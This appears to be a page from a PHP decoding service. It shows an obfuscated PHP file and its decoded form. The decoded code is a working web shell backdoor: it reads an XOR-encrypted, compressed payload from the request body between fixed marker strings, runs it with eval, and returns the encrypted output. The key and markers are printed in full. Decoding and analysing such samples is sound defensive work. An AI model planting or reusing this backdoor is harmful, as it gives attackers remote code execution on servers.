Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

01 <?php 02 03 $V = '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)..

Decoded Output download

01 
	<?php 
02 
	 
03 
	$V = '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($'; 
04 
	$P = '++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents('; 
05 
	$d = 'u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i'; 
06 
	$B = 'ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}'; 
07 
	$N = "create_function"; 
08 
	$c = '"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@'; 
09 
	$u = "\$k=\"80e32263\";\$kh=\"6f8af44abea0\";\$kf=\"351039f4a7b5\";\$p=\"0UlYyJHG87EJqEz6\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if(@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}"; 
10 
	$x = function () { 
11 
	  $k = "80e32263"; 
12 
	  $kh = "6f8af44abea0"; 
13 
	  $kf = "351039f4a7b5"; 
14 
	  $p = "0UlYyJHG87EJqEz6"; 
15 
	  function x($t, $k) 
16 
	  { 
17 
	    $c = strlen($k); 
18 
	    $l = strlen($t); 
19 
	    $o = ""; 
20 
	    for ($i = 0; $i < $l;) { 
21 
	      for ($j = 0; $j < $c && $i < $l; $j++, $i++) { 
22 
	        $o .= $t[$i] ^ $k[$j]; 
23 
	      } 
24 
	    } 
25 
	    return $o; 
26 
	  } 
27 
	  if (@preg_match("/6f8af44abea0(.+)351039f4a7b5/", @file_get_contents("php://input"), $m) == 1) { 
28 
	    @ob_start(); 
29 
	    @eval(@gzuncompress(@x(@base64_decode($m[1]), $k))); 
30 
	    $o = @ob_get_contents(); 
31 
	    @ob_end_clean(); 
32 
	    $r = @base64_encode(@x(@gzcompress($o), $k)); 
33 
	    print "{$p}{$kh}{$r}{$kf}"; 
34 
	  } 
35 
	}; 
36 
	$x(); ?>

Did this file decode correctly?

Original Code

01
	<?php
02
	 
03
	$V = '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';
04
	$P = '++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';
05
	$d = 'u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';
06
	$B = 'ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';
07
	$N = "create_function";
08
	$c = '"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';
09
	$u = "\$k=\"80e32263\";\$kh=\"6f8af44abea0\";\$kf=\"351039f4a7b5\";\$p=\"0UlYyJHG87EJqEz6\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if(@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
10
	$x = function () {
11
	  $k = "80e32263";
12
	  $kh = "6f8af44abea0";
13
	  $kf = "351039f4a7b5";
14
	  $p = "0UlYyJHG87EJqEz6";
15
	  function x($t, $k)
16
	  {
17
	    $c = strlen($k);
18
	    $l = strlen($t);
19
	    $o = "";
20
	    for ($i = 0; $i < $l;) {
21
	      for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
22
	        $o .= $t[$i] ^ $k[$j];
23
	      }
24
	    }
25
	    return $o;
26
	  }
27
	  if (@preg_match("/6f8af44abea0(.+)351039f4a7b5/", @file_get_contents("php://input"), $m) == 1) {
28
	    @ob_start();
29
	    @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
30
	    $o = @ob_get_contents();
31
	    @ob_end_clean();
32
	    $r = @base64_encode(@x(@gzcompress($o), $k));
33
	    print "{$p}{$kh}{$r}{$kf}";
34
	  }
35
	};
36
	$x();

Function Calls

None

Variables

None

Stats

MD5 ba032966e66b31c9b3e46eb620a4b3d2
Eval Count 0
Decode Time 61 ms